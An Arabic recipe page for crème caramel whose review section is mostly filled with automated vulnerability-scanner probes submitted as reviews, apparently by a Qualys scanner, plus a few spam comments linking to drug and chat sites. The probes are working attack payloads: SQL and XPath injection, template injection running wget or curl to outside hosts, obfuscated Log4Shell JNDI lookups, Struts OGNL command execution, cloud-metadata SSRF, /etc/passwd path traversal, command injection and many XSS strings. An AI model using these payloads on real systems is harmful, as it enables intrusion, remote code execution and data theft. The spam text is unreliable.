Recipe Detail Page
كريم كراميل

كريم كراميل

1552 التقييمات 1552 المراجعات
  • 20-40 دقيقة
  • 4 حصص التقديم
تُعرفوا على هذه الحلوى الكلاسيكية المفضلة لدى الجميع، والتي يتم تحضيرها في جميع أنحاء العالم. جربوا طريقة تحضير الكريم كراميل باستخدام حليب أبو قوس.
  • يحرك السكر و ربع كوب ماء معًا في قدر صغير. يُغلى المزيج على نار متوسطة إلى عالية ويُطهى حتى يبدأ الخليط في التحول إلى اللون الذهبي. يسكب الكراميل في صينية خبز صغيرة. تترك صينية الخبز جانبًا.

  • يخفق البيض والصفار البيض في وعاء كبير حتى يمتزج جيدًا. يضاف حليب أبو قوس المكثف المحلى، وحليب أبو قوس المبخر والحليب كامل الدسم، والفانيليا والملح ويخفق حتى يتجانس.

  •  يصفى الخليط من خلال مصفاة شبكية دقيقة في وعاء كبير لإزالة أي أجزاء من البيض. ثم يسكب الكاسترد المصفى في صينية الخبز فوق الكراميل. 

  •  تغطى صينية الخبز بإحكام بورق الألمنيوم.

  • يسكب الماء الساخن حول صينية الخبز المحضرة حتى تصل إلى نصف جوانبها. تخبز على 148 درجة مئوية لمدة 40 دقيقة. 

  • تخرج الصينية من الفرن بحذر. يزال ورق الألمنيوم يُغطّى بإحكام بورق النايلون ويُبرّد في الثلاجة طوال الليل أو حتى 4 أيام.

  • يقلب الكريم الكراميل على الصحن ويقدم.

حقائق غذائية

لكل حصة

292 Kcal

تغذية كاملة

!شارك طبقك

هل جربت هذه الوصفة؟

انقر فوق الصورة واذكر حسابنا
RainbowMilk@
أو أضف هاشتاغ
RainbowKitchenMagic#
في Instagram أو Twitter

وصفات مشابهة

لحم ستروجانوف الكريمي

لحم ستروجانوف الكريمي

  • 40دقيقة
  • 6 Serving

.إذا كانت إضافة حليب أبو قوس المبخر إلى هذه الوصفة تجعلك في محتار في الأمر، فلا تخف أبداً. أضفه واستمتع به

تيراميسو

تيراميسو

  • 30-40دقيقة
  • 6 Serving

.الحلى الايطالية الكلاسيكية الرائعة وسهلة التحضير والتي لا تحتاج إلى الخَبز، وتضم العديد من المكونات الشهية في طبق واحد

كيك سهل التحضير بدون خبز

كيك سهل التحضير بدون خبز

  • 20 – 40دقيقة
  • 6 Serving

إليكم كيك سهل التحضير وبخطوات بسيطة باستخدام حليب شوكولاتة أبو قوس المكثف المحلى.

All Topics in كريم كراميل

التقييمات والمراجعات

1552 التقييمات1552 المراجعات

ملاحظاتك تهمنا.

أخبرنا رأيك في هذه الوصفة.

أضف مراجعة وتقييماً
 
قيّم هذه الوصفة
Thank you for your feedback.
Please check the the captcha form.
something went wrong.
John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John" and false() and "or" = "and

1

John" or true() or "and" = "and

1

John

1

John

1 and false() and 'or' = 'and'

John

1 or true() or 'and' = 'and'

John

1

John and false() and 'or' = 'and'

1

John or true() or 'and' = 'and'

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John' or not(false()) or 'true' = 'true

1

John

1

John' or true() or 'and' = 'and

1

John

11 or 11=12

John

11 or 11=11

John

1

John

1

John1 or 11=11

1

John

1' and 'tpklq'='xqlkp

John

1' or 'tpklq'='tpklq

John' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp

1

John

1

John' or 'tpklq'='tpklq

1

John

1

John

1

John

1

John') and 'swqtp'='ptqws

1

John') or 'swqtp'='swqtp

1

John

1

John

1

John AnD 7248=4757

1

John AnD 7248=7248

1

John aND 7248=2491 + 4757

1

John and NULL IS NULL

1

John

1

John

1

John

1

John or 6248 IS NULL

1

John or NULL IS NULL

1

John

1

John

1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729

John

1 and 4325=2728 --

John

1

John

1

John or 4325=4325 --

1

John

1

John' or 3789=3789 --

1

John

1

John

1') and 2634=1123 --

John

1

John

1

John

1

John

1

John

1

John') or 2634=2634 --

1

John

1

John

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://a0e364589f38978bea8dda4d20041840cadc94cc.1523145317359663.1872819839.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }}

John

1

John

1

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://0896b3344642897dcf924fdcd3a6c94fa855c184.1523145317359663.4237911352.oscomm15019101.oscomm.eu1.qualysper

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://0da81f561a46e3d7cafbe901743db6008bcb1b8b.1523145317359663.2021905764.oscomm27.oscomm.eu1.qualysperiscope.com.')}

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://1168cd61f1d3f75ee88a3e9c65490dc38d5e1ad6.1523145317359663.159518285.oscomm27.oscomm.eu1.qualysperiscop

1

John

1

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://fa73ba824b80b7358419f38ca80490534909d063.1523145317359663.2886684041.oscomm26.oscomm.eu1.qualysperisco

1

John

${url:UTF-8::https://e7b586ee1a98476299e143ac182ecce53c88105b.1523145317359663.3887713567.oscomm25.oscomm.eu1.qualysperiscope.com./}

John

1

John

1

${url:UTF-8::https://ca2f2f49e375d9faee1e18e23c146f1b70ab5405.1523145317359663.202458433.oscomm25.oscomm.eu1.qualysperiscope.com./}

1

John

1

John

${url:UTF-8::http://b82fecc500db5c97551b120fc873c47dc8d395cd.1523145317359663.2797838500.oscomm24.oscomm.eu1.qualysperiscope.com.}

John

1

${url:UTF-8::http://7124f272934b5b86082c688ea26a52bc29ea2f96.1523145317359663.486818309.oscomm24.oscomm.eu1.qualysperiscope.com.}

1

John

1

John

1

John

${url:UTF-8:https://2b764f4a0d123378d8055cefbe96229ab2027f76.1523145317359663.2368037417.oscomm23.oscomm.eu1.qualysperiscope.com.}

John

1

${url:UTF-8:https://4e96f8d8d6e250099300561a94009d442d6f87df.1523145317359663.3668452057.oscomm23.oscomm.eu1.qualysperiscope.com.}

1

John

${url:UTF-8:http://0d61a8f298f36aa8cae847ebc941613386a5cbc4.1523145317359663.122336536.oscomm22.oscomm.eu1.qualysperiscope.com.}

John

1

John

1

${url:UTF-8:http://e615613d171b78cf55cd5ac6fc85d268f4826448.1523145317359663.3613721860.oscomm22.oscomm.eu1.qualysperiscope.com.}

1

John

${dns:address|67fa2164f3f71c0173503685074e41438ea2d847.1523145317359663.3090613491.oscomm21.oscomm.eu1.qualysperiscope.com.}

John

1

${dns:address|f6b1ff3eadaa12de3f3c121fcab48aaa51fa438b.1523145317359663.1981007597.oscomm21.oscomm.eu1.qualysperiscope.com.}

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://f0be9cd073f99ad6029af8a31e70d19a9debb9f8.1523145317359663.3764464079.oscomm20.oscomm.eu1.qualysperiscope.com.')}

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://86999c96893f105b80d6ae36b984c38fa68c7669.1523145317359663.3013316236.oscomm20.oscomm.eu1.qualysperiscope.com.')}

1

John

${url:UTF-8:https://05847f3e79757d4b8ce4bb6a20449d56cc8eb647.1523145317359663.1777744348.oscomm19.oscomm.eu1.qualysperiscope.com./}

John

1

John

1

${url:UTF-8:https://8f935ddd9bc8fb64b001a0e063ed9c3806bfe086.1523145317359663.56850651.oscomm19.oscomm.eu1.qualysperiscope.com./}

1

John

1

John

${url:UTF-8:http://9b2ae72e84714163d7041d3a2eed75d46d6e8a27.1523145317359663.688345274.oscomm18.oscomm.eu1.qualysperiscope.com./}

John

1

${url:UTF-8:http://69e1a8123b882547431a5920598d7cea57514778.1523145317359663.1112557246.oscomm18.oscomm.eu1.qualysperiscope.com./}

1

John

${url:UTF-8::https://dfd82ac023d7b5fc00371335c3af775b84386359.1523145317359663.3384346302.oscomm17.oscomm.eu1.qualysperiscope.com./}

John

1

${url:UTF-8::https://2b10a066086726147f0711f974019e4b88cac36f.1523145317359663.2825403047.oscomm17.oscomm.eu1.qualysperiscope.com./}

1

John

1

John

${url:UTF-8::https://c6e1923750cb74e3e2ce57237b7b2cffa82d0f2b.1523145317359663.1617674705.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}

John

1

John

1

John

1

${url:UTF-8::https://011cab7ff7810bfbce1869a701b747fc5c6f93a2.1523145317359663.3826771601.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}

John

1

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://e7474bbe79808e20f122815b496de6b197371151.1523145317359663.2007344329.oscomm14.oscomm.eu1.qualysperiscope.com.')}

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://502458bdf6bc6e480acf999fee4a30cb7c6088a5.1523145317359663.1630880520.oscomm14.oscomm.eu1.qualysperiscope.com.')}

1

John

1

John

powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@

John

1

John

1

John

1

powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://6263c5b2ef40b7804bb1098671004d03ed44689a.1523145317359663.2286839542.oscomm12.oscomm.eu1.qualysperiscope.com.')}

John

1

John

1

John

1

John

1

John

powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@

John

1

John

1

powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://a5748278d2a1f4c13b7e85650c68876c1e14f1de.1523145317359663.2441055442.oscomm10.oscomm.eu1.qualysperiscope.com.')}

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://fc92900e5acd621abbf8a748d6b5db39c67e5947.1523145317359663.1573529369.oscomm10.oscomm.eu1.qualysperiscop

1

John

${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}

John

1

${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}

1

John

1

John

${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}

John

1

John

1

${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}

1

John

1

John

${url:UTF-8:https://f3a77e378da0a3128f4b285d555fb563d11da45a.1523145317359663.1995767358.oscomm07.oscomm.eu1.qualysperiscope.com.}

John

1

${url:UTF-8:https://ddba21f33c7855ffad50a4a12b853f8506ab2c8f.1523145317359663.2656480023.oscomm07.oscomm.eu1.qualysperiscope.com.}

1

John

1

John

1

John

${url:UTF-8:http://e4bdf82508c3956975a1720add3885bf5a235c62.1523145317359663.869463722.oscomm06.oscomm.eu1.qualysperiscope.com.}

John

1

John

1

John

1

John

1

John

$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D

John

1

John

1

$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D

1

John

1

John

${dns:address|eed8fe372c4a043424b3867c9d38a814ec7c1535.1523145317359663.1457093420.oscomm04.oscomm.eu1.qualysperiscope.com.}

John

1

John

1

${dns:address|25e5f5da0c3d3bdfc1f745e3c9c8f260d8ec7d3e.1523145317359663.120711641.oscomm04.oscomm.eu1.qualysperiscope.com.}

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}

1

John

1

John

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://ee6de8b98d32ce31c1f19eb21f737c3999562000.1523145317359663.3795509148.oscomm02.oscomm.eu1.qualysperiscope.com.')}

John

1

John

1

${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://df7a77aa2584a536430dcac9f45ff636a0ac3f81.1523145317359663.213959754.oscomm02.oscomm.eu1.qualysperiscope.com.')}

1

John

1

John

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9c261899e535657983a59c279a2de18ff8e60739.1523145317359663.884101388.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://b676f8e0ed1410fba54cea8a027aac2a78588624.1523145317359663.3410237247.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://679fe8f9aae421633b05e5a063af9a37fe4f6dc1.1523145317359663.4065473924.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://09d987bc00c61c4e7a3782b962c074acb7e4c55d.1523145317359663.3280538587.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//1b3125037900ce60454970742cf22e5109c1fd6b.1523145317359663.1271029463.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a6505c5543007d1e7614e5ae773ee8e1a81da167.1523145317359663.1625497673.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${jndi:dns://924ea46cf622739ba785740b873d8edb021bea3f.1523145317359663.1155268685.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${jndi:dns://2c570678a8732c552d4b8a5c4c675679eeed1a32.1523145317359663.2343291780.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//aad6c66c493d6a3674c44fe31e5605408db6e612.1523145317359663.3170070127.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//44dabd58497edce4dc92b012e8ccb2ca3114497d.1523145317359663.544636816.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${jnd${123%ff:-${123%ff:-i:}}ldap://0835cfc7e3d3c7a758d4fe481acaa31bd88ba635.1523145317359663.3493693662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jnd${123%ff:-${123%ff:-i:}}ldap://6e5a9ae6f3f442c2ce842ddc704186299793b38d.1523145317359663.2406127967.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${j${::-n}di:ldap${::-:}//f87ebd990cde3072282e83a60db86a227f8237ad.1523145317359663.1710158108.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${j${::-n}di:ldap${::-:}//b390d9ccc51886852c7fbd2f396022bd2effa770.1523145317359663.2682141920.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://c969cbaf9598f9c5918aadd7b458c094dfa49b2d.1523145317359663.2809206209.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://e6562c799b451c1572cf3d21a55d9441e80a04bb.1523145317359663.907044701.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://f8a6643c0f4f6224a78fbe91ada3f864ce69e992.1523145317359663.1062401354.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2d14ad9f6948bf5b15029e555bb38073008219d3.1523145317359663.137895838.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${jndi:rmi://eb31997ecf8d64f2533ee8c3eda88a968021ff63.1523145317359663.2178349668.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

John

1

John

1

John

${jndi:ldap://3a11a332570ed3cc3dc1b10abebc7a515629d6d5.1523145317359663.941521998.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${jndi:ldap://6b0ba0f50f51c8fbd3f2d897f63dde0eff96cc3b.1523145317359663.884274828.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

1

ping -c 2 b7c12f313fc1b9e01eb5a9c259bc8b5b6a762e13.1523145317359663.4166643789.oscomm01.oscomm.eu1.qualysperiscope.com.

1

John

1

John

http://2ea6710d82fb9e311733f12179f56242b72da341.1523145317359663.2708986990.ssrf01.ssrf.eu1.qualysperiscope.com.

John

1

John

1

http://8eaa5101b4c8d496023f47849bf0c070b89c4e59.1523145317359663.3956953710.ssrf01.ssrf.eu1.qualysperiscope.com.

1

John

1

John

Joe+ bcc:was_engine@f19d3c600321dcce2edde129faa720ba05aaf4ab.1523145317359663.1037769574.smtphi01.smtp.eu1.qualysperiscope.com.

John

1

John

1

John

1

John

1

John

http://169.254.169.254/latest/meta-data/

John

1

John

1

http://169.254.169.254/latest/meta-data/

1

John

1

John

</script><script>function(){qxssczvZVNZY};</script>

John

1

John

1

</script><script>function(){qxssg1sE51Te};</script>

1

John

<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->

John

1

John

1

<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->

1

John

1

John

1

John

1

John

1

(23.0231*213.759)

1

John

1

John

;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */

John

1

John

1

John

1

;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */

1

John

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

John

1

John

1

John

1

John

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

John

1

John

1

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

1

John

1

John

"-qxssit2c1TF0()-"

John

1

John

1

John

1

"-qxss3zR59V3k()-"

1

John

1

John

'-qxssmTxK05o8()-'

John

1

'-qxssrfAg2ld3()-'

1

John

*/;(function(){qxss63ekgbFk});/*

John

1

*/;(function(){qxss4Ua72M14});/*

1

John

1

John

9 ;(function(){qxssXys877fy});//

John

1

John

1

John

1

9 ;(function(){qxssFvz0g8g3});//

1

John

1

John

1

John

1

9;(function(){qxssSpk4cQyA});//

1

John

1

John

';(function(){qxssk5SULyXR});/**/'

John

1

John

1

';(function(){qxssS3NZuwcS});/**/'

1

John

1

John

qualys(aqxssWST5B6mr)xyz

John

1

John

1

qualys(aqxss5GJc9X6i)xyz

1

John

1

John

");(function(){qxssqZXgJ7lP});/**/"

John

1

John

1

John

1

");(function(){qxss35NCW081});/**/"

1

John

1

John

";(function(){qxss4Nsqo6xG});/**/"

John

1

John

1

";(function(){qxssbU5ZVb58});/**/"

1

John

javascript:qxss(X154405448Y7_2Z);

John

1

John

1

javascript:qxss(X154405448Y1_2Z);

1

John

1

John

http://rfitest/

John

1

John

1

John

1

http://rfitest/

1

John

1

John

|netstat -an

John

1

John

1

|netstat -an

1

John

a(){}phpinfo(); function a

John

1

John

1

a(){}phpinfo(); function a

1

John

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

John

1

John

1

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstan

1

John

1

John

%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

John

1

John

1

%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#

1

John

1

John

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

John

1

John

1

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#og

1

John

../../../../../../../Windows/System32/drivers/etc/hosts

John

1

../../../../../../../Windows/System32/drivers/etc/hosts

1

John

1

John

../../../../../../../Windows/System32/drivers/etc/hosts

John

1

John

1

../../../../../../../Windows/System32/drivers/etc/hosts

1

John

1

John

//....//....//....//....//....//....//....//etc/passwd

John

1

John

1

John

1

//....//....//....//....//....//....//....//etc/passwd

1

John

1

John

1

John

1

John

1

//..//..//..//..//..//..//..//etc/passwd

1

John

1

John

../../../../../../../etc/passwd

John

1

../../../../../../../etc/passwd

1

John

1

John

/../../../../../../../etc/passwd

John

1

/../../../../../../../etc/passwd

1

John

1

John

/../../../../../../../etc/passwd

John

1

John

1

/../../../../../../../etc/passwd

1

John

1

John

John

1

John

1

1

John

1

John

1e309

John

1

John

1

John

(

John

1

(

1

John

,

John

1

John

1

John

1

John

1

John

``

John

1

John

1

``

1

John

/*

John

1

/*

1

John

#

John

1

#

1

John

1

John

;--

John

1

;--

1

John

1

John

1'

John

1

John

1

John'

1

John

1

John

qualys<esi:comment text="" />was<!--esx-->esi

John

1

John

1

John

1

q Qualys_resp_hdr_injection: Vulnerable

1

John

1

q Qualys_resp_hdr_injection: Vulnerable

1

John

q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA

John

1

John

1

John

1

<script src=http://localhost/j

1

John

%3cscript z%3e_q(y)%3c/script%3e

John

1

John

1

John

1

John

< script a=4>qssuN0wSEVT=7< /script>

John

1

John

1

< script a=4>qssiu8En8Bs=7< /script>

1

John

1

John

" onEvent=X154405448Y7_2Z

John

1

" onEvent=X154405448Y1_2Z

1

John

1

John

' onEvent=X154405448Y7_2Z

John

1

' onEvent=X154405448Y1_2Z

1

John

1

"'><qss a=X154405448Y1_2Z>

1

John

1

John

1

John

1

<EMBED SRC=//localhost/qt2uKBS3k.swf AllowScriptAccess=always></EMBED>

1

John

1

John

<STYLE type="text/css" a=3>BODY{background:url("javascript:qssbeL6bMQm=7")}</STYLE>

John

1

John

1

<STYLE type="text/css" a=3>BODY{background:url("javascript:qss267Qdx69=7")}</STYLE>

1

John

1"><DIV STYLE="width:expression(qss17bJp4fB=7)">

John

1

John

1

John"><DIV STYLE="width:expression(qssL979U1YS=7)">

1

John

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qssle35S1h6=7">

John

1

John

1

John

1

John

<IMG SRC=javascript:qss0nSG9TsX=7>

John

1

John

1

John

1

<IMG SRC=javascript:qssTg9buV2r=7>

1

John

1

John

1

John

1

John

1

"'><<SCRIPT a=2>qssLWH2RbbR=7;//<</SCRIPT>

1

John

1

John

1

John

1

<SCRIPT/QSSP0rK2vCf SRC=//localhost/j>

1

John

1

John

<script =">" SRC=//localhost/j7Pb94vrc>

John

1

<script =">" SRC=//localhost/jQY7c06xa>

1

John

1

John

<script src=//localhost/jy35T7iU9>

John

1

John

1

John

1

John

1 <script>_q_q=random(hjs61h5v)</script>

John

1

John

1

John <script>_q_q=random(K0LmKq1Z)</script>

1

John

<script>_q=random(X154405448Y7_2Z)</script>

John

1

John

1

John

1

<script>_q=random(X154405448Y1_2Z)</script>

1

John

<script>_q=random(X154405448Y7_2Z)</script>

John

1

John

1

John

1

<script>_q=random(X154405448Y1_2Z)</script>

1

John

1

John

"'><qss5Q7D8B60 `;!--=&{()}>

John

1

John

1

"'><qss050ZQbfA `;!--=&{()}>

1

John

1

John

z--><qssj281YM15>

John

1

John

1

John

1

John

1

John

1"'><qssQ7h4buj2>

John

1

John

1

John

1

John"'><qssv8mVda79>

1

John

1

John

"><qssuQKU7I6F>

John

1

John

1

"><qssby30dmwE>

1

John

1

John

javascript:qxss(X154405448Y7_2Z);

John

1

John

1

John

1

javascript:qxss(X154405448Y1_2Z);

1

John

" onEvent=X154405448Y7_2Z

John

1

" onEvent=X154405448Y1_2Z

1

John

1

John

1

John

1

' onEvent=X154405448Y1_2Z

1

John

1

John

<script>_q=random(X154405448Y7_2Z)</script>

John

1

John

1

John

1

<script>_q=random(X154405448Y1_2Z)</script>

1

John

1

John

"'><qss a=X154405448Y7_2Z>

John

1

John

1

John

1

"'><qss a=X154405448Y1_2Z>

1

objenia

It also used to slow or stop the spread of hormone receptor positive breast cancer in both pre and postmenopausal women <a href=http://buylasixon.com/>lasix and bp</a>

Peter Winter

Peter Winter

GenniemiOn

gay univere men chat [url="https://chatcongays.com"]gay chat phone[/url] gay cam chat avenue

DeeynmiOn

oc gay chat rooms arab friends gay webcam chat <a href="https://free-gay-sex-chat.com/">westchester gay chat rooms </a>

John

1

John

1

John(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lan

1

John

1' + sleep(29*100*Math.sqrt(100)) + '

John

1

John

1

John' + sleep(29*100*Math.sqrt(100)) + '

1

John

1

John

1'; var djci=sleep(29*1000) + '

John

1

John

1

John

1

John'; var djci=sleep(29*1000) + '

1

John

1

John

1'; var djci=sleep(29*1000);//

John

1

John

1

John

1

John'; var djci=sleep(29*1000);//

1

John

1

John

1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/

John

1

John(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/

1

John

1

John

1;SELECT sleep(29); --

John

1

John

1

John;SELECT sleep(29); --

1

John

1

John

